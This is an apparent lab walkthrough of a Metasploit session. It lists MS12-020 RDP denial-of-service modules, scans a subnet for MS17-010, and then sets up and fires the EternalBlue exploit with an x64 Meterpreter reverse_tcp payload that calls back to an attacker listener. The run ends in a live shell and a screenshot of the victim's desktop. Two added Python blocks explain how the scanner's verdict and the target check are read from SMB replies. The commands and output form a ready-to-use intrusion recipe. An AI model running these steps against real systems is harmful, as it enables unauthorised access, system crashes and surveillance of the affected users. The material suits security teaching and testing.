msf > search 12_020
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker
Load the module. Note that ms12_020_maxchannelids is a denial-of-service auxiliary module (it triggers the RDP use-after-free and crashes the target), not a code-execution exploit; the companion ms12_020_check module only tests whether the host is vulnerable.
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Show the module options:
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf > search 17_010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Scan the internal network for hosts vulnerable to MS17-010. The scanner needs no credentials (SMBUser/SMBPass are optional): it opens a null session and judges "likely VULNERABLE" from the SMB error code the server returns, without exploiting anything. With CHECK_DOPU enabled it also reports whether the DOUBLEPULSAR backdoor is already installed on a vulnerable host.
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24
RHOSTS => 192.168.136.129/24
msf auxiliary(scanner/smb/smb_ms17_010) > exploit

[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] 192.168.136.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
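What does "likely VULNERABLE" actually rest on? The following is an added example, not code from this page or from Metasploit, that decodes the two SMBv1 responses the scanner's verdict depends on. It assumes the probe is an SMB_COM_TRANSACTION PeekNamedPipe on FID 0 sent over a null session, which an unpatched host answers with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205) and a patched host with STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED, and that a DOUBLEPULSAR-infected host answers a Trans2 SESSION_SETUP with multiplex ID 0x51 instead of the 0x41 it was sent. The packets are constructed in the block, so it runs offline; the function names are mine.

```python
"""Added example: how the MS17-010 / DOUBLEPULSAR verdicts are read off SMBv1 headers.

Not page or Metasploit code. Assumptions (see lead-in):
  * PeekNamedPipe probe: 0xC0000205 => unpatched, 0xC0000008 / 0xC0000022 => patched.
  * DOUBLEPULSAR: Trans2 SESSION_SETUP reply carries MID 0x51 instead of the sent 0x41.
  * All packets below are constructed, not captured.
"""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25     # carries the PeekNamedPipe probe
SMB_COM_TRANSACTION2 = 0x32    # carries the Trans2 SESSION_SETUP probe

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205

# 32-byte SMBv1 header (MS-CIFS 2.2.3.1), little-endian, no padding:
# Protocol, Command, Status, Flags, Flags2, PIDHigh, SecurityFeatures,
# Reserved, TID, PIDLow, UID, MID
HEADER = struct.Struct("<4sBIBHH8sHHHHH")


def parse_smb_header(packet: bytes) -> dict:
    """Strip the 4-byte NetBIOS session header and decode the SMBv1 header."""
    if len(packet) < 4 + HEADER.size:
        raise ValueError("packet too short for an SMBv1 header")
    nb_type, nb_len = packet[0], int.from_bytes(packet[1:4], "big")
    if nb_type != 0x00 or nb_len != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    (magic, command, status, _flags, _flags2, _pid_high, _sig,
     _reserved, tid, pid, uid, mid) = HEADER.unpack_from(packet, 4)
    if magic != SMB_MAGIC:
        raise ValueError("not an SMBv1 packet")
    return {"command": command, "status": status,
            "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def build_smb_response(command: int, status: int, mid: int, body: bytes = b"") -> bytes:
    """Construct a minimal server-to-client SMBv1 message (Flags bit 7 set)."""
    hdr = HEADER.pack(SMB_MAGIC, command, status, 0x98, 0xC807, 0,
                      b"\0" * 8, 0, 0, 0xFEFF, 0, mid)
    payload = hdr + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def classify_ms17_010(peek_response: bytes) -> str:
    """Verdict from the PeekNamedPipe reply, as the scanner reads it."""
    h = parse_smb_header(peek_response)
    if h["command"] != SMB_COM_TRANSACTION:
        return "unexpected"
    if h["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely vulnerable"
    if h["status"] in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "patched"
    return "unknown"


def doublepulsar_present(trans2_response: bytes) -> bool:
    """Backdoor fingerprint: Trans2 reply with MID 0x51 where 0x41 was sent."""
    h = parse_smb_header(trans2_response)
    return h["command"] == SMB_COM_TRANSACTION2 and h["mid"] == 0x51


def demo() -> dict:
    """Run the classifiers over constructed replies for an unpatched,
    a patched, and a DOUBLEPULSAR-infected host."""
    unpatched = build_smb_response(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES, 0x40)
    patched = build_smb_response(SMB_COM_TRANSACTION, STATUS_ACCESS_DENIED, 0x40)
    infected = build_smb_response(SMB_COM_TRANSACTION2, STATUS_SUCCESS, 0x51)
    clean = build_smb_response(SMB_COM_TRANSACTION2, STATUS_SUCCESS, 0x41)
    return {
        "unpatched": classify_ms17_010(unpatched),
        "patched": classify_ms17_010(patched),
        "infected_dopu": doublepulsar_present(infected),
        "clean_dopu": doublepulsar_present(clean),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point for a practitioner: the verdict is an error-code side channel, so a host that returns anything other than those three statuses (a third-party SMB stack, SMB1 disabled, a filtering device) lands in "unknown" and needs a second look rather than being written off as patched.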
Load the exploit module. VerifyTarget and VerifyArch are on by default, so the module refuses to fire unless the OS string and architecture reported by the target match the selected exploit target; leave them on.
msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
Configure the target, the payload, and the listener address. The target is x64, so the payload must be an x64 one (windows/x64/meterpreter/reverse_tcp); LHOST is the attacker's address that the reverse shell connects back to.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129
RHOST => 192.168.136.129
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131
LHOST => 192.168.136.131
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.136.129  yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.136.131  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
Launch the exploit. EternalBlue works by corrupting the kernel's non-paged pool (hence the module's "average" rank), so a failed attempt can blue-screen the target rather than simply fail; MaxExploitAttempts bounds how many times the module retries with a larger groom count.
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.136.131:4444
[*] 192.168.136.129:445 - Connecting to target for exploitation.
[+] 192.168.136.129:445 - Connection established for exploitation.
[+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.136.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.136.129:445 - Starting non-paged pool grooming
[+] 192.168.136.129:445 - Sending SMBv2 buffers
[+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.136.129:445 - Sending final SMBv2 buffers.
[*] 192.168.136.129:445 - Sending last fragment of exploit packet!
[*] 192.168.136.129:445 - Receiving response from exploit packet
[+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.129:445 - Sending egg to corrupted connection.
[*] 192.168.136.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
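The "CORE raw buffer dump" above is the NativeOS string the server sent in its session-setup reply, and it is what the VerifyTarget check compares against the selected target. The following added example, not code from the page or from the Metasploit module, reassembles that dump back into the string and applies the same kind of pre-flight check: it accepts the target only if the OS string names Windows 7 or Server 2008 R2 and the architecture reported by the scanner is x64. The dump lines are transcribed from the session above with their byte spacing restored; the target table is the module's single target (id 0) from `show options`; the function names and the build-number heuristic are mine.

```python
"""Added example: decode the exploit's hex dump and re-run a VerifyTarget-style check.

Not page or module code. DUMP_LINES are the four dump lines from the session
above (spacing restored); TARGETS is the module's target 0 as listed by
`show options`. The build-number extraction is a heuristic of my own.
"""
import re
from typing import Optional

DUMP_LINES = [
    "[*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2",
    "[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris",
    "[*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P",
    "[*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1",
]
DECLARED_LEN = 53  # from "CORE raw buffer dump (53 bytes)"

# target id -> (name as shown by the module, OS names it covers, required arch)
TARGETS = {
    0: ("Windows 7 and Server 2008 R2 (x64) All Service Packs",
        ("Windows 7", "Windows Server 2008 R2"), "x64"),
}

DUMP_LINE = re.compile(r"0x([0-9a-fA-F]{8})\s+(.*)$")
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")


def decode_hex_dump(lines, declared_len: int) -> bytes:
    """Rebuild the bytes from 16-bytes-per-line dump output.

    Each line is 'offset  hh hh ... hh  ascii'. At most 16 byte tokens are
    taken per line and the ASCII column is ignored because its first token
    is never two hex digits in this dump; the offset of every line must equal
    the number of bytes decoded so far, and the total must match the length
    the module declared, so any over- or under-consumption is caught.
    """
    data = bytearray()
    for line in lines:
        m = DUMP_LINE.search(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(data):
            raise ValueError("dump offset does not match bytes decoded so far")
        for tok in m.group(2).split()[:16]:
            if not HEX_BYTE.match(tok):
                break
            data.append(int(tok, 16))
    if len(data) != declared_len:
        raise ValueError(f"decoded {len(data)} bytes, module declared {declared_len}")
    return bytes(data)


def build_number(native_os: str) -> Optional[int]:
    """Heuristic: the last 4-5 digit run is the build (7601 here; '2008' is
    the product year, which is why the last run is taken, not the first)."""
    runs = re.findall(r"\b\d{4,5}\b", native_os)
    return int(runs[-1]) if runs else None


def select_target(native_os: str, arch: str) -> Optional[int]:
    """Mirror VerifyTarget/VerifyArch: return the target id whose OS list
    and architecture both match, or None to refuse to fire."""
    for tid, (_name, os_names, want_arch) in TARGETS.items():
        if arch == want_arch and any(n in native_os for n in os_names):
            return tid
    return None


def check_session(lines, declared_len: int, arch: str) -> dict:
    native_os = decode_hex_dump(lines, declared_len).decode("ascii")
    return {"native_os": native_os,
            "build": build_number(native_os),
            "target": select_target(native_os, arch)}


if __name__ == "__main__":
    print(check_session(DUMP_LINES, DECLARED_LEN, "x64"))
```

Running it against the dump above yields the string "Windows Server 2008 R2 Enterprise 7601 Service Pack 1", build 7601, and target 0; a Server 2012 R2 string or an x86 architecture gets None, which is the case where the module should (and, with VerifyTarget on, does) refuse to run rather than groom the pool of the wrong kernel.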
Capture the target's desktop from the Meterpreter session:
meterpreter > screenshot
Screenshot saved to: /root/VrBAGsTE.jpeg